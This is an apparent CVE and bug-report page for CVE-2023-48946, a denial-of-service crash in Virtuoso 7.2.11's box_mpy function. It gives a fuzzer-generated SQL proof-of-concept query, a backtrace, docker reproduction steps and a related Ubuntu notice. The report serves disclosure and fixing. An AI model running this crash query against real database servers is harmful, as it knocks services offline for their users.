Headline
CVE-2023-48946: Fuzzer: Virtuoso 7.2.11 crashed at box_mpy · Issue #1178 · openlink/virtuoso-opensource
An issue in the box_mpy function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 INT ) ; INSERT INTO v0 VALUES ( 2147483647 ) ; INSERT INTO v0 VALUES ( -1 ) ; INSERT INTO v0 ( v1 , v1 , v1 ) SELECT 54 , v1 , -128 FROM v0 AS v4 , v0 , v0 AS v3 NATURAL JOIN v0 AS v2 ; UPDATE v0 SET v1 = NULL WHERE ( v1 * 2147483647 , CASE WHEN v1 = ‘x’ THEN 75 WHEN DENSE_RANK ( ‘x’ ) THEN 25942677.000000 END + 16 * 127 ) IN ( SELECT v1 FROM v0 WHERE v1 >= 127 AND ( v1 * 16 , v1 , ( SELECT v1 FROM v0 WHERE ( v1 , v1 ) IN ( SELECT v1 , v1 AS v8 FROM v0 AS v6 NATURAL JOIN v0 AS v7 NATURAL JOIN v0 AS v5 NATURAL JOIN v0 WHERE v1 ) ORDER BY v1 ) ) - ‘x’ GROUP BY 48002391.000000 ) ;
backtrace:
#0 0xc201b3 (box_mpy+0x83) #1 0x754c6e (code_vec_run_v+0x19be) #2 0x7b86bb (end_node_input+0x13b) #3 0x7af05e (qn_input+0x3ce) #4 0x7af78f (qn_ts_send_output+0x23f) #5 0x7b509e (table_source_input+0x16ee) #6 0x7af05e (qn_input+0x3ce) #7 0x44c979 (chash_fill_input+0x589) #8 0x5370af (hash_fill_node_input+0xef) #9 0x7af05e (qn_input+0x3ce) #10 0x7af4c6 (qn_send_output+0x236) #11 0x44c52e (chash_fill_input+0x13e) #12 0x5370af (hash_fill_node_input+0xef) #13 0x7af05e (qn_input+0x3ce) #14 0x7af4c6 (qn_send_output+0x236) #15 0x44c52e (chash_fill_input+0x13e) #16 0x5370af (hash_fill_node_input+0xef) #17 0x7af05e (qn_input+0x3ce) #18 0x7af4c6 (qn_send_output+0x236) #19 0x8214bd (set_ctr_vec_input+0x99d) #20 0x7af05e (qn_input+0x3ce) #21 0x7c1be9 (qr_dml_array_exec+0x839) #22 0x7ce602 (sf_sql_execute+0x15d2) #23 0x7cecde (sf_sql_execute_w+0x17e) #24 0x7d799d (sf_sql_execute_wrapper+0x3d) #25 0xe214bc (future_wrapper+0x3fc) #26 0xe28dbe (_thread_boot+0x11e) #27 0x7fa2b8a15609 (start_thread+0xd9) #28 0x7fa2b87e5133 (clone+0x43)
ways to reproduce (write poc to the file /tmp/test.sql first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.